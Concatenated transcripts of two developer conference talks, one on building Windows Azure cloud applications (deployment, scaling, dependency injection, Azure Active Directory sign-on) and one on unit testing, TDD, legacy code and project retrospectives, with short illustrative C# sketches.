Now what's great is you can deploy on a free environment and then scale up as you need to. And basically the way this works, it's simple. You saw me earlier create the website and then just deploy to it. Under the covers behind the scenes, it's kind of a complex environment. It's really building and providing for you a lot of features that, if you were using purely a virtual machine in order to set up and manage IIS, you'd actually have to build yourself. And this diagram here on the right is sort of an example of what this environment looks like. Basically when you show up and you say I want to run this website, you can choose how many machines you want to run it on. So I can say I want to run on one virtual machine or I want to run on two virtual machines. And it'll basically stand it up and create it for you. And then what the Azure Websites service is also doing is providing a deployment endpoint so that when you say I want to deploy my app, whether it's through VS or whether it's through an automation script, it'll automatically deploy onto those machines the bits that you actually go ahead and produce. And so it does all of the laying down of the bits, setting them up, making sure IIS is ready in order to use them. And then when a customer shows up and types in the URL, they hit those machines. Now the cool thing also about the Websites service is they don't hit the virtual machine directly. Windows Azure Websites runs a pool of what we call load balancers that are using a layer seven application request routing load balancer, which again you can run yourself. But the beauty is it's set up for you automatically and they'll route that request to the appropriate machine. If a lot of requests come in at the same time, they'll automatically route them to all the different virtual machines, and it uses a fairly smart heuristic so that it sends requests both based on affinity as well as based on the actual queue depth inside IIS as well as the CPU on the virtual machine. And so basically we can be very smart in terms of how the load traffic is actually distributed, and all that's built in. And then the other thing that's nice about it is if a virtual machine goes down, it'll automatically pull it from the rotation so no more traffic goes to it, spin up a new instance and then automatically start directing traffic to it. And so all these kinds of mechanics happen behind the scenes; all you need to do is basically just say create me a website in one line of PowerShell or just go in the portal and create the site and you get to take advantage of all this. And that's what we're doing within the app. So let's walk through the code and look at this real quick. So basically this is my Fix It app here and you can see it's just a standard web project. I can run it. I've got a logging library and a data access library that we'll look at. And so when I hit Ctrl+F5 here you can see this is running in my local dev environment so I can do everything offline if I want to. In terms of kind of how it's implemented, it's using ASP.NET MVC. So let's just go back here and we'll look at logging and other things in part two. But you can see basically I've got controllers. I've got a home controller, a task controller and a dashboard. The dashboard gives me kind of CRUD support. And again you can see pretty standard action methods that are exposed here. They're all doing async. And so you can kind of see a simple example here where I have a Details action that gets an id passed in.
It calls a repository, returns HttpNotFound if it didn't find it, or otherwise just renders the content there. One thing you'll notice is I'm passing in a few parameters as constructor arguments to all of my repositories and all of my controllers. So my controllers all get an IFixItTaskRepository. And if you go and look at the repository you'll see it gets passed in a logger interface that it uses as it's doing its data access. And basically what I'm taking advantage of is dependency injection, and specifically the Autofac dependency injection library. And so there's a couple of different ways you could do dependency injection. This is a nice framework, so instead of me manually passing in these things, what I did inside this code is take advantage of Autofac. And all I need to do is say every time you see an IFixItTaskRepository in a controller, or an ILogger or an IPhotoService, just pass this specific instance into it. And so basically in just sort of these six lines of code (there's a sketch of that registration just below) I can now very cleanly, inside any of my classes that I use inside my framework, just go ahead and get my dependencies passed in. Makes it a lot easier for me to go ahead and test. And that basically ends up being my data library in a nutshell. And again it's running inside Azure. So if I go ahead and click on this. This is a North Europe instance here. I can drill into this particular app inside Azure. And you'll notice built into Azure is a dashboard so I can see how many requests came in. That was probably from last night, and that was from when I was running it just a few minutes ago. If I want to scale it I can click the scale tab, or again I can use a PowerShell command, so everything I'm doing here I can also go ahead and run as a script. And if I wanted to say hey, let's deploy this on six medium sized virtual machines, all you need to do is hit save and it will auto scale this app now, in a matter of about 10 seconds, to five more virtual machines that are each about three and a half gigs of RAM, and my app is now running on it. So basically it was just a few commands, or through the portal, I can very easily deploy this app and then scale it up or scale it down. And that whole environment that I walked through, where I have load balancers automatically in front of it, I'm getting automatic protection in case that app ever goes down, and I'm running it in a completely async way, all just works. So you can do this pretty much with any ASP.NET app and take advantage of it really easily. One last thing I'll just mention real quick is if you click the configure tab you'll notice here a bunch of app settings and connection strings that are available. When I ran that script up front, one of the things I briefly touched on is how you can go ahead and script these as part of the environment. So when I created this environment as an example here I basically specified that I want to use these settings. Some of them never change; a few of them, like my storage account name, are dynamically created elsewhere in the script and passed in as arguments. One nice thing about this model is that as a developer I can basically have dev settings inside my web.config file. So I just read app settings or get a connection string from my config file, and then at runtime this allows me to override the settings that are in the web.config file with production environment settings.
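The registration itself isn't reproduced in the transcript, so here is a sketch of what those few lines of Autofac wiring typically look like in an MVC app; FixItTaskRepository and the interfaces are the names assumed earlier, not necessarily the actual Fix It sample types:

```csharp
using System.Reflection;
using System.Web.Mvc;
using Autofac;
using Autofac.Integration.Mvc;

public static class DependenciesConfig
{
    // Called once from Application_Start.
    public static void RegisterDependencies()
    {
        var builder = new ContainerBuilder();

        // Let Autofac construct the MVC controllers in this assembly.
        builder.RegisterControllers(Assembly.GetExecutingAssembly());

        // Whenever a constructor asks for IFixItTaskRepository, hand it the
        // concrete repository; ILogger and IPhotoService registrations
        // follow the exact same pattern.
        builder.RegisterType<FixItTaskRepository>().As<IFixItTaskRepository>();

        // Plug the container into MVC so controller dependencies resolve automatically.
        DependencyResolver.SetResolver(new AutofacDependencyResolver(builder.Build()));
    }
}
```

With that in place, a controller or repository just declares what it needs in its constructor and never news up its own dependencies, which is also what makes it easy to swap in fakes for testing.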
So you'll notice here from my dev environment here I have a local DB data source checked into my web.config and so all the developers will just use a local database on the machine as they're doing development. And then at runtime when I create my environment in an automated way that script created a database for me and it automatically set a production connection string on that web server and now when my app runs in this environment it will automatically connect to the production database instead of my local DB. And so this provides a really nice way that you can override in an automated way and it makes it really easy so you're not checking in secrets into your source code so you don't actually have to modify the web.config as part of your build process. Instead you can use this app settings and connection strings model to basically override these values at runtime and have only a set of approved folks know what the production settings actually are. So again the scripts will show you how to do that. So we talked about some web things, let's now talk about security and then we'll talk about data. And so what I want to talk a little bit about is this pattern here which is single sign on. And one question people often ask me is okay I'm building primarily apps for the employees within my company, how do I host it in the cloud and still allow them to use the same security model that they already know and use in their on-premises environment when they hit my app that's running inside the firewall. And one of the ways that we're kind of doing to enable this and you'll see some announcements come out in the next couple weeks is through something we call Windows Azure Active Directory. And this is basically providing Active Directory in the cloud. It integrates with an on-premises environment, enables single sign on within all your apps and it does it in a way that's open standard. So I can use SAML, I can use OAuth and I can use OAuth 2 in order to connect to it and integrate within my applications. And the beauty is we're making it really easy in order to actually set up. And so you can kind of just build a diagram here. Imagine you have an on-premises Windows server environment where you're using Active Directory to have your employees sign on. And so you kind of make this work just like today. What we're allowing you to do with Azure is create a directory in the cloud and it's a free feature so you can do it without having to pay anything. And that directory can be used also to sign on. And you can have that directory only have basically be disconnected so you can put anyone you want into it. Or the cool thing is you can connect it to your on-premises Active Directory at which point all of the users that could log on on-premise can now also authenticate using Azure without you having to open up a firewall, without you having to actually deploy any custom new servers. You can leverage all the existing Active Directory environment that you know and use today. And at that point then your mobile devices and your web apps can authenticate in the cloud and you could basically have your app that you hosted in the cloud, including your enterprise internal-facing apps, now have enterprise single sign on. You can also use this for third-party apps. So for example, if you're using Salesforce.com or Google Apps or Office 365, you can use this directory in the cloud in order to enable single sign on with them as well, all in a secure way. 
And the beauty is anytime a new user gets created into your organization or anytime a password changes, they just use the same mechanism they use today on-premise and it will automatically flow and apply immediately in the cloud as well. So it makes it very secure. Doing this is pretty easy. Again, you can do it through PowerShell. I'm going to do it through the portal just to kind of illustrate the concepts. Basically you just go inside Azure, you click on Active Directory. If you don't already have a directory, there's a little button here called Create One. Right now you can only create one directory and you can't delete it. So think carefully about what you name it. I named it Scott Guthrie, which is actually very confusing because Scott Guthrie is now both a directory as well as a user. The ability to create multiple directories is coming, but right now it's only one per account. And basically, within this directory, I can add users. So we basically have full support for creating and managing users within this environment. So if I wanted to, I could go ahead and create Tom and add this and I can give username last names, pick the roles, and it will go ahead and create a new account for them in the system. And once I do that, then they can go ahead and log in using this cloud directory. What's cool of those, I can also click this directory integration tab. And if I enable this and then download a tool that there's a link for, I can also then sync my existing on-premises active directory that I'm already using inside my organization with this cloud, at which point all the users in my organization will show up in this directory as well. And at that point, then, I now have a lot more users and I can do single sign-on within all my apps in order to integrate them. And doing this is really easy. We just shipped a tool actually last week that you can download. Again, it's a free tool and the Windows Azure Active Directory itself is free to anyone. You download the tool, you click Next, you enter in your Azure account details, you click Next, you enter in a domain user account that's on your corporate network. So this is your existing on-premise network. You click Next, you click this enable password sync if you want to go ahead and hash your passwords and store a hash version in the clouds. We never know what your passwords are. It's a one-way hash. Alternatively, if you never want to send any passwords, including hashes, you can also use ADFS and set it up. So a few extra steps there, but that also allows you to use the cloud directory as well. But for this simple model, just go ahead and click the hash. Click Wait a few minutes and you're done. And at that point, then, if you run this on a domain controller, just one domain controller inside your organization, it can be Windows Server 2003 or higher. All your users are basically in the cloud and you can now do single sign-on from within any web or mobile application. Again, using SAML, OAuth, or WSFed as an API head. This makes it really easy in order to actually integrate enterprise security in this model. So let's go ahead and walk through how you do that. It's really simple. Basically, you can go now into the portal and you can create an application. Again, you can also do this through the command line. And all you need to do is just say, what's the app I want to run? So I can call it fixit web 2. I can enable single sign-on. 
I can also give directory access so you could read or write properties in the directory on users so you could see what their phone number is, whether they're in the office when they last logged on, in a kind of graph REST API way. So if you're ever familiar with Facebook, think of this as like an enterprise Facebook graph where I can just say, just do sign-on. And all I need to do then is basically paste in the URL of where my app is deployed and I give it effectively a URI secret that embeds as part of it. And then you hit OK. And at that point, I can have any number of apps deployed. This is the one that I have inside North Europe. And basically, I just paste in this key into my web.config file. And this works for any app in the tenant so you don't have to configure it. And at that point, what I can do inside the new version of ASP.net that's coming out in about a week and a half. So now, let's go ahead and do that in room numberconf
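The wiring itself isn't shown in the transcript, but hooking an ASP.NET app up to a Windows Azure AD tenant for WS-Federation sign-on can be done with the OWIN WS-Federation middleware (one of several options; templates of that era also used WIF configuration instead). The sketch below is an assumption about how that typically looks, and the tenant name, realm URI and metadata URL are placeholders, not values from the demo:

```csharp
using Microsoft.Owin.Security;
using Microsoft.Owin.Security.Cookies;
using Microsoft.Owin.Security.WsFederation;
using Owin;

public partial class Startup
{
    public void ConfigureAuth(IAppBuilder app)
    {
        // Keep the signed-in user in a cookie after the federation handshake.
        app.SetDefaultSignInAsAuthenticationType(CookieAuthenticationDefaults.AuthenticationType);
        app.UseCookieAuthentication(new CookieAuthenticationOptions());

        app.UseWsFederationAuthentication(new WsFederationAuthenticationOptions
        {
            // The app ID URI you entered when registering the app in the directory (placeholder).
            Wtrealm = "https://mytenant.onmicrosoft.com/fixit-web",

            // Federation metadata document for the Windows Azure AD tenant (placeholder).
            MetadataAddress =
                "https://login.windows.net/mytenant.onmicrosoft.com/federationmetadata/2007-06/federationmetadata.xml"
        });
    }
}
```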
|
This two part talk will explore how to build real world cloud applications using Windows Azure. The talk will cover key patterns of cloud computing including: - Automating Everything, - Source Control Best Practices, - Continuous Integration/Delivery, - Enterprise Identity and SSO Integration, - Web Development Best Practices, - Data Storage Options We’ll discuss each of the above cloud patterns in the talk, and then demonstrate how to really use them by walking through real code that shows how to leverage them within a Windows Azure application.
|
10.5446/51508 (DOI)
|
Thank you. We just finished talking about the importance of unit tests. I haven't talked about TDD or anything else because I want to get across the idea that unit tests by themselves are worthwhile, independent of whether you're using TDD or something like that. That becomes important because if you have legacy code and it doesn't have unit tests, it's not too late to add those unit tests or to start introducing unit tests. You don't have to use some other fancy methodology. The next thing I want to talk about is automated unit testing. Automated unit tests are those that are run automatically, usually inside a testing framework that will check to make sure that they have succeeded or they have failed. It makes unit tests a lot more useful because you get to run them very frequently, ideally after any non-trivial code change, which hooks into the idea that you want to make sure that they can be run very, very quickly with almost no overhead. I mentioned this once before, but it bears repeating that unit tests are software and as such they need to be maintained. They're not just temporary scaffolding. What this means is they have to be kept up to date with the code that they test. They should be made up of good code, which is readable, which is maintainable. Remember, one of the roles of unit tests is to serve as documentation for interface clients. That's another reason why they need to be really nice to look at. Now I want to talk a little bit about test-driven development. I'm going to assume, well, let me ask, how many people are familiar with the basics of test-driven development? As expected, especially at a conference like this, pretty much everybody. You already know the basics. Fundamentally, test-driven development means what you do is you write a test for functionality before you implement it. This is also called test-first programming. Then we've got a TDD loop that you execute to improve the functionality of the system. You write a small test for the new functionality. You confirm that the test fails to make sure that the test is actually part of the test is being executed, so you want it to fail right away. You write enough code for the new functionality to pass the test. Now you know you have the new functionality that you wanted. You then refactor to get rid of any code smells because while you were in step three, you wrote just enough code to get the new functionality to work. Now you're going to clean it up in step four. Now that you've cleaned it up, you run the test, excuse me, now you're going to refactor to get the code smells out in step five, and then you're going to reconfirm that the system still passes all of the tests. That's the basic TDD loop. This essentially elaborates on what I just told you, but since most people here are familiar with TDD, I'm not going to go through this in great detail. Basically these are again the steps along with their motivation. What makes TDD work is it relies on automated test execution. This is usually in some kind of test execution framework. Almost all the frameworks at some level, they mimic the original ones, which was JUnit. Basically the idea is that as you're running tests, usually you've got a green bar, and as long as the bar stays green, that means you're passing all the tests, which is good. If any of your tests fail, then the bar turns red, and that indicates that at least one of your tests failed, and there's usually information below to tell you exactly which tests failed. 
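To make the loop concrete, here is a small made-up example in C# with xUnit.net (any test framework works the same way; PriceCalculator is purely illustrative and not something from the talk). The test is written first and fails until just enough production code exists to make it pass:

```csharp
using Xunit;

// Step 1 of the loop: write a small test for functionality that doesn't exist yet.
public class PriceCalculatorTests
{
    [Fact]
    public void ApplyDiscount_TenPercent_ReducesPrice()
    {
        var calculator = new PriceCalculator();

        decimal discounted = calculator.ApplyDiscount(200m, 10);

        Assert.Equal(180m, discounted);
    }
}

// Steps 2-3: the test is red until just enough code is written to turn it green.
public class PriceCalculator
{
    public decimal ApplyDiscount(decimal price, int percent)
    {
        return price - (price * percent / 100m);
    }
}
```

Run it, see the red bar, write ApplyDiscount, see the green bar, then refactor with the test as a safety net.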
People doing TDD often talk about red-green refactor, which means first you write a test before you've written the code that will make it succeed, and then you run the test. The test is supposed to fail. That's to make sure you really are running the test. A lot of people have thought that their systems were passing all the tests, only to discover they weren't actually executing the tests. That gives you the red bar. Then you write the code to make it succeed. Then you get a green bar, ideally, to show that you are now passing all of your tests, and then you refactor and rerun the tests. There are a lot of benefits of TDD, which I want to summarize for you, because I do think that they're important, and these are benefits that are separate from just using unit tests. First it addresses both external and internal quality, because you are making sure that you do provide the functionality the interface promises. That's external quality, but an express part of the methodology is to refactor to eliminate code smells. That is internal quality. What I like about the methodology is it addresses both aspects of code quality. Defects are detected sooner than they otherwise would be in many cases. You can find problems in the specification because it's really hard to write tests for what's not well specified. Remember, you write the tests before you write the code. If you don't know what the test is supposed to do, then you get to go back and have the specification become clarified. If you find a problem in the code, if you get a red bar, you know it immediately. In practice, this means that TDD programmers tend to spend a lot less time debugging. If you get a red bar, it has to be because of some change you just made. If you're working in small increments, then you didn't change very much most recently. Most people don't even bother to fire up a debugger. They just go back and look at the most recent code change that they made. Another thing I like a lot, interfaces are created before implementations. This I just think is great. The interface that you have to a function or the interface you have to a class is going to be determined by the person writing the test case rather than by the person who's doing the implementation. The test person is going to want to have the clearest, most straightforward interface that they can imagine. You tend to get better interfaces this way. On the other hand, if you have the person implementing the function determining the interface, they're going to try to produce an interface that is going to be easy to implement, which may not be an interface that is easy to use correctly and hard to use incorrectly. Another good thing of TDD is that code reuse is facilitated. This is what we know. We know that any time you write code, if you want to use it in a different context, that's a huge amount of work. Almost always going from one user to two users is a hard amount of work because you didn't really understand how to make it general enough to be usable in multiple contexts. But going from two clients to three clients is typically a lot easier because you've already done some necessary generalization. Well, with TDD, the code is born with two clients, the original application and the test code. So you've already got to the first two clients, which means using it in new contexts should be relatively easy. Another advantage is that gold plating is discouraged. 
Fundamentally, developers are less likely to add a lot of unnecessary functionality to the system if they know they have to write unit tests to confirm that it passes all the time. So it discourages people from doing a lot of work that doesn't otherwise need to be done. Now using TDD means that we are asking developers to be active in some kind of a test role. It is important to recognize that most developers are better programmers than their testers. These are separate skills. The developers are not necessarily the same people as good testers and vice versa. For example, a lot of developers don't use code coverage tools and they don't use metrics and there's been a lot of empirical evidence that shows that if you say to a developer, okay, you've written some tests, what percentage of your code do you think it covers? They'll go, ah, I'm covering 80%, 90% of my code for sure. It's covering 22% of their code, something like that. Remember I said earlier, programmers are optimists, which you kind of have to be a programmer. Really it's a miracle anything ever works. If you think of all the things that can go wrong. I mentioned this morning, programmers tend to focus on clean tests. Clean tests, these are positive tests. They exercise normal functionality. I gave the appropriate inputs. I checked to make sure I've got the proper output. Those are clean tests. Now, dirty tests, those are negative tests. They exercise exceptional use. For example, I give it invalid inputs. I set things up so that the heap is going to be exhausted. I set things up so that I'm going to get numeric overflow on some of my computations. All the things that are no fun to test because they're not supposed to actually occur while the program is running, but they actually do have to be tested. Steve McConnell says that mature test organizations, they have five times as many dirty tests as clean ones. In other words, they have five times as many tests around the fringe, checking to make sure that all the weird situations which aren't supposed to occur are correctly handled. Then they do tests for the situation which are correctly handled. Programmers usually like to test things which are going to work as opposed to things that are going to fail. Furthermore, if you have a test author, be the same as the person who wrote the code. They bring the same interpretation of the spec both to the test and to the code, which means an outside tester might interpret the specification differently and that could help expose weaknesses in the specification. Programmers need to write unit tests and they do a fine job of doing it. It's just important to bear in mind they don't do the role of professional testers. Testers tend to focus on these other things. Furthermore, unit tests can't replace independent testing. They're actually complementary. Fundamentally, developers do white box testing, they know how the code works. Testers can do black box testing. We also know that if I have multiple methodologies for accomplishing something to identify defects, such as testing, I'm going to get more defects discovered if I combine them than if I use either one of them independently. If you have programmers doing some testing and you have testers doing some testing, you're going to get better coverage in terms of identifying defects than if you have only programmers or only testers identifying defects. 
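To make the clean-versus-dirty distinction concrete, here are a couple of dirty tests for the same illustrative PriceCalculator sketched earlier. They exercise inputs that are never supposed to occur, and they stay red until the production code actually validates its arguments, which is exactly the edge-case work developers tend to skip:

```csharp
using System;
using Xunit;

public class PriceCalculatorDirtyTests
{
    [Fact]
    public void ApplyDiscount_NegativePercent_Throws()
    {
        var calculator = new PriceCalculator();

        // A dirty test: invalid input should be rejected, not silently accepted.
        Assert.Throws<ArgumentOutOfRangeException>(
            () => { calculator.ApplyDiscount(200m, -5); });
    }

    [Fact]
    public void ApplyDiscount_PercentOverOneHundred_Throws()
    {
        var calculator = new PriceCalculator();

        Assert.Throws<ArgumentOutOfRangeException>(
            () => { calculator.ApplyDiscount(200m, 150); });
    }
}
```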
Having said that, unit tests could reduce the time and the cost of conventional testing simply because fewer bugs should be downstream for testing to identify, assuming that developers have done a decent job of unit testing upstream. Yeah? Would you say that, well, many of the cases that you just mentioned, like also in the previous action, actually being in the unit tests, eventually, you know the developer may not have enough? The question is that a lot of the dirty things that I talked about, for example, invalid inputs, forced overflow, heap exhaustion, yes, ideally those should be part of the unit tests. It just turns out that programmers in general don't tend to want to test those edge case conditions as well, but they certainly should be part of. In order to convince yourself as a developer that your component works correctly, you have to check those edge conditions as well. You'd ideally like to also test the exceptional conditions, like I run out of memory or I run out of threads or whatever it happens to be. Yes, I agree with you. So, the guideline is to embrace automated unit testing. Any questions about unit tests, TDD, the advantages that you can accrue from them? Yeah? I'm sorry, can you please speak louder? Okay. Quit. Okay, so the question is, my manager comes to this meeting, he goes, great, unit tests are wonderful, tells me I need to write unit tests for the 100,000 functions in the code base that we've been maintaining for the past 20 years. What should you do? Well, you heard my advice, but let me generalize your question slightly, which is, I have an existing code base, a very large code base. It wasn't developed with unit tests, so what should our approach be to adding unit tests to an existing code base? Is that a reasonable alternative question? Okay. For things like this, I really like the approach that Michael Feathers takes in his book. He wrote a book called Working Effectively with Legacy Code. And he has an interesting definition of legacy code. His definition of legacy code is code that has no unit tests. So if you wrote the code 30 seconds ago and it has no unit tests, that's legacy code from his perspective. And so essentially his argument is, if you have code that's already an existing code base and as far as you know it's working fine, then there's no compelling reason to go and add a bunch of unit tests to it. Because there's been no evidence that it's going to need to be modified. But from time to time, you're going to discover bugs in the code, or you're going to find places where you'd like to do some refactoring, or you're going to want to add features. I mean you're going to go back and you're going to revisit this code from time to time. And his argument is, at the time when you are going to make some changes to the legacy code, then what you want to do is start imposing unit tests around the part of the code that you're going to change. Because you want to make sure that when you change something, you don't break any other functionality inadvertently. And he described this as you have a sea of legacy code with no tests, and over time little islands begin to pop up where they have put in some unit tests. I think this is a very pragmatic, practical approach to introducing unit tests to an existing code base, which is basically you only do it at a time when you're going to need to modify the code anyway. Because once you've modified the code, you're going to have to verify that it does the right thing. So does that seem reasonable? 
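One concrete way to put such an island of tests around legacy code before changing it is a characterization (or pinning) test in the style Feathers describes: run the existing code once, record what it actually does today, and assert exactly that, so the upcoming change can't silently alter behavior. The LegacyInvoiceFormatter below is a made-up stand-in for whatever legacy class is about to be touched:

```csharp
using System.Globalization;
using Xunit;

public class LegacyInvoiceFormatterCharacterizationTests
{
    [Fact]
    public void Format_ExistingBehaviour_IsPinnedDown()
    {
        var formatter = new LegacyInvoiceFormatter();

        string result = formatter.Format(42, 99.5m);

        // The expected value is whatever the current implementation returns,
        // captured by running it once, not what we think it *should* return.
        Assert.Equal("INV-0042: 99.50", result);
    }
}

// Stand-in for the legacy class so the sketch compiles; in reality this code already exists.
public class LegacyInvoiceFormatter
{
    public string Format(int invoiceNumber, decimal amount)
    {
        return "INV-" + invoiceNumber.ToString("D4") + ": "
             + amount.ToString("0.00", CultureInfo.InvariantCulture);
    }
}
```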
So I'm pretty sure that the book is listed in the reading, but I'm not sure. If not, it's by Michael Feathers. It's called Working Effectively with Legacy Code. So the next topic I want to talk about is to perform retrospectives. A retrospective is a mechanism for learning from something you've done in the past. Basically the idea is you're developing software. And maybe you're at a point now, for kicks, we'll talk about the end of a project. The project is done, and now what you want to do is you want to take some time and step back and say, what can we learn about software development based on our most recent experience? And typically what you're trying to figure out is what worked well, because this is stuff that we want to make sure we're going to do again in the future. So what were some ideas that we came up with that we think are worth keeping? Really focusing on ideas that might otherwise be forgotten? Or you also want to identify things that should be done differently. For example, what did we do that really didn't bias anything? Because we want to stop doing that. Or what did we do that didn't work as well as we would have liked? Because we want to change the way that that works. Ideally you want to identify what worked so we don't forget, what didn't work so we don't keep doing it, and what needs to be changed. Now those are the two technical aspects of retrospectives. Everybody agrees on those. If you look in the Agile community, everybody's talking about that kind of stuff as well, which is completely applicable. But there is an important component that also has to be taken into account, which is a social component. At the end of a large work unit, so for example the end of a project or a major release, in addition to having a technical artifact, you have people who worked on the technical artifact. And especially if the process of producing it was not necessarily as pleasant as it might have been. Those people need to deal with those issues in some way so it can help the participants achieve effectively closure in one way or another. Work is a really important part of people's lives. And so if you finish a project and it was very, very successful, it's kind of like having your child go off to college. And if you work on a project and it didn't go very well, it's kind of like having your child flunk college, I guess. So that's something which needs to be addressed in some way if you want those people to continue to perform at the highest possible level in their software development. So retrospectives allow you to address both technical issues but also social issues. Retrospectives, the purpose of them is to lay the groundwork for an improved software process in the future. You want to improve the development process both technically and socially. Norm Kirth, who wrote a book on retrospectives, and I'm going to be basing my presentation largely on what he said, he calls it the single most important step in process improvement which may be a little bit self-serving since he wrote a book on it. But it does enable people to focus on the future and put their problems in the past. Now retrospectives have a really good cross-disciplinary track record. They're used in athletics all the time. Why did we win the game? Why did we lose the game? The military, why did we win the war? Why did we lose the war? Medicine, why did we lose the patient? The notion of experience reports is all about what worked and what didn't. 
And they're also one of the 12 Agile Manifesto Principles which says that at regular intervals the team reflects on how to become more effective, fine-tunes and adjust its behavior accordingly. So there's a lot of evidence that retrospectives are a positive way to improve software development. They help through the process of learning. Now experience is something which comes automatically, if you do some stuff by definition you get experience. But learning is something that comes about through reflection. Retrospectives basically force you to think about what you've been doing and whether it was effective. In many people's experience the only time software developers really stop and think about how they produce software, about what works and what doesn't work is during a retrospective because the rest of the time they're so busy trying to produce software. They just don't have time to think about it. If you don't stop from time to time and think about what you're doing and try to figure out a better way to do it you're unlikely to change things. As they say, if you always do what you've always done you'll always get what you've always gotten. Retrospectives also permit hidden issues, a chance to surface, and they help build an institutional memory. You want to remember what worked on these projects and why and what did not work and why not. The justifications are particularly important because as time goes on it may turn out that the reasons for things working or the reasons for things not working change. You want to have made note of why they worked or why they didn't work. Actors can also help in terms of building a software development team by facilitating behavioral change. It turns out that unresolved issues actually hinder behavioral change and people tend to embrace the practices that they help establish. If you can explain to people why they need to do something and especially if you feel like they had a role in making those changes that encourages them to adopt different kinds of behavior in the future. One manager who I talked to says retrospectives are the best tool for getting team buy-in on change. So if you can get people talking about what's working, what's not working, let's do things a little bit differently that can help you change the way you develop software. The time to hold retrospectives depends on what you're trying to accomplish but logically it's at the end of any logical work period. For example, the end of a project is a reasonable time to hold a big retrospective. You could also have a lesser retrospective at the end of a milestone and at the end of an iteration or the end of a sprint which some of the agile methodologies advocate. The important thing is they need to be included in the schedule. If they're not included in the schedule, they're not going to take place. Nobody has a bunch of extra time. The longer the work period, the longer the retrospective that you should have. So for example, if you had a month-long iteration, maybe a retrospective for a couple of hours would be fine. If it was a 12-month project, you might need something as long as two or three days, assuming there were a lot of people involved to really be able to figure out what worked and what did not work and how you can do better in the future. You're not likely to get much of meaty retrospective in a stand-up meeting. It's not really the kind of thing where you do it that way. 
The duration is also going to depend on the size of the team, the project complexity, whether the team is distributed, a lot of factors enter into it. And the sooner after the work period, the better because people forget things. They focus on new tasks, that kind of stuff. So you really want to be able to get people to talk about how the project went or how the iteration went or how the milestone went while it's still fresh in their minds before you move on to do additional things. Now I'm going to be talking about an approach to retrospectives, but I'm going to tell you right now that it's kind of a heavyweight approach to retrospectives. There's two basic schools of thought for retrospectives these days. The heavierweight approach, which I'll be talking, which was described originally by Norm Kearth, is based on the assumption that there's been a fairly large amount of work by a fairly large number of people. So it might have been a 12-month project or maybe a 15-month project, and there might have been a couple of dozen people involved. Where the people involved are the programmers and the testers and the people who were doing the requirements and just everybody involved in the software. At the same time, I recognize that a lot of retrospectives are now done in the form of agile methodologies. So you have a sprint, which maybe is going to be a couple of weeks, or maybe it's going to be a month. And as a result, you can have retrospectives much more frequently. Having said that, it is increasingly becoming recognized that even if you have a project, let's say that lasts 12 months, and it's using some kind of an agile methodology. So every two weeks or every month you're doing a little bit of a retrospective, it doesn't change the fact that at the end of that really long period, you need to have a meteor retrospective. So even the agile methodologies are going to recognize that occasionally you do need a heavier weight retrospective, especially at the end of a longer period of time. So like I said, I'm talking about retrospectives in general, but the focus I'm taking is a little bit more on the heavyweight versions because I think that they don't get the attention that they deserve. The people who need to participate in the retrospective, fundamentally it's a representative of all the relevant parties involved in the project. Norm Kurth talks a lot about what he calls the full story. The full story is essentially everything that happened that went into the process of making the software. It would include specification, development, testing, deployment, delivery, satisfaction of customers, everybody involved there. And you want to get the full story, which means you need to get representatives from all these important parties. The more information you get, the more you can learn. And remember, the whole purpose is learning. So for example, party A can learn why party B behaved the way that they did. So you might find out that the people writing the specifications were really insistent on something and the people doing the coding couldn't understand why they were behaving that way at a retrospective they should be able to find out. So possible parties would include customers, requirements analysts, developers, testers, managers, and then in the more formal retrospectives, you want to have a facilitator. And a facilitator ideally is somebody who is skilled at working with groups of people and who is neutral and who is a trusted party by everybody who's going to be there. 
Because sometimes issues come out that need to be discussed and it can be a little bit, there can be some tension. Ideally there should also be somebody to take notes, formally called ascribed. Shouldn't be the facilitator, their hands are busy doing something else. You don't want to lose the information. One of the most important things about a retrospective is this notion of safety. Now the purpose of a retrospective is to figure out what worked and what didn't. Sometimes describing what didn't work especially can potentially hurt people's feelings or can potentially lead to bad feelings of one form or another. But it's really important to find out that something did not work effectively. As a result it is very important that people can express themselves without feel of repercussions because if people suppress information you're losing part of the story. It is therefore up to the facilitator and the participants to work to maintain safety and this leads to what Norm Curth calls his prime directive. Everybody who is participating in a retrospective has to agree to the following, not necessarily explicitly but this is the philosophy you need to have. That regardless of what we discover we understand and we truly believe that everyone did the best job they could given what they knew at the time, their skills and abilities, the resources available and the situation at hand. In other words you go into a retrospective with everybody saying listen I take it for granted everybody did the best that they could. Nobody was trying to sabotage the project and this is true even if the project was a success. Because the goal of the game is to learn, it's not to blame and the ultimate goal is to improve things, it's to be constructive. If you don't have safety, if people cannot speak freely or express their opinions without fear of repercussions you're not going to get anything out of a retrospective. So the phases of a retrospective there are three of them. First there's some preparation prior to the meeting, you have to determine what are the objectives in our retrospective, what are we really going to be focusing on here and then you gather some data and you gather artifacts which may be relevant. At the meeting itself you create and you discuss the project record so basically you talk about what happened on this project, what did we do. You then prioritize the topics that you want to talk about during the retrospective and you analyze the ones that are most important. Because the goal is learning and you want to figure out what worked, what didn't, what needs to be changed, you need to figure out okay if something needs to be changed how is it going to be changed so you develop some kind of an action plan and then you perform a retrospective on the retrospective. You ask yourself what worked, what didn't work, how can we improve what we did. And then there has to be some follow through. If you have some action items you need to make sure that they have follow through to make sure that those things are really pursued. If you have a retrospective and come up with some ideas on action plans and nobody follows up on those people are going to lose faith in the process of retrospectives, they're going to be less inclined to fully participate in the future. So I want to talk a little bit more about these different phases. There's the meeting itself. It is interactive, it is participatory. It's very important that this is a meeting to try to get information to come out. This is not a presentation. 
So Ellen Godesiner, she calls them a workshop as opposed to a meeting. It has been commented that if you see somebody show up at a retrospective and the first thing you want to do is show PowerPoint slides, that's a really bad sign. That's not what it's about, it's some kind of a presentation. The people who do retrospectives professionally will often incorporate what they call exercises. The exercises are designed to first establish and maintain safety, to bring out important lessons and to allow difficult topics to be discussed. Basically, the facilitator is setting up an environment that is most likely to lead to useful information coming out of the retrospective. Now I want to talk a little bit about this notion of exercises that can improve the retrospective. I'm going to give you two, or maybe only one, I'm not quite sure, either one or two sample exercises. I can't remember how many I have in the presentation now. The first one is called Timeline. Timeline is a way to combine everybody's view of the work period under review. This is especially useful for big retrospectives. The idea here is that you have a lot of people who worked on the project, where a lot might be 12 to 15, and nobody knows everything that went on in the project. The first thing you do is build the timeline. What often happens is they'll put up a big piece of paper on a wall, or there can be a whiteboard, and then everybody gets to go up, and it's particular points in time that are marked on the board or on the paper. You get to say when important things occurred. This is when the build first succeeded. This is when we found out that the unit tests were not being run, and we thought that we had better coverage than we did. People write down whatever events they consider to have been meaningful during the course of the project. The meaning of a significant event is determined by the participants. They can write down whatever they want to. If somebody 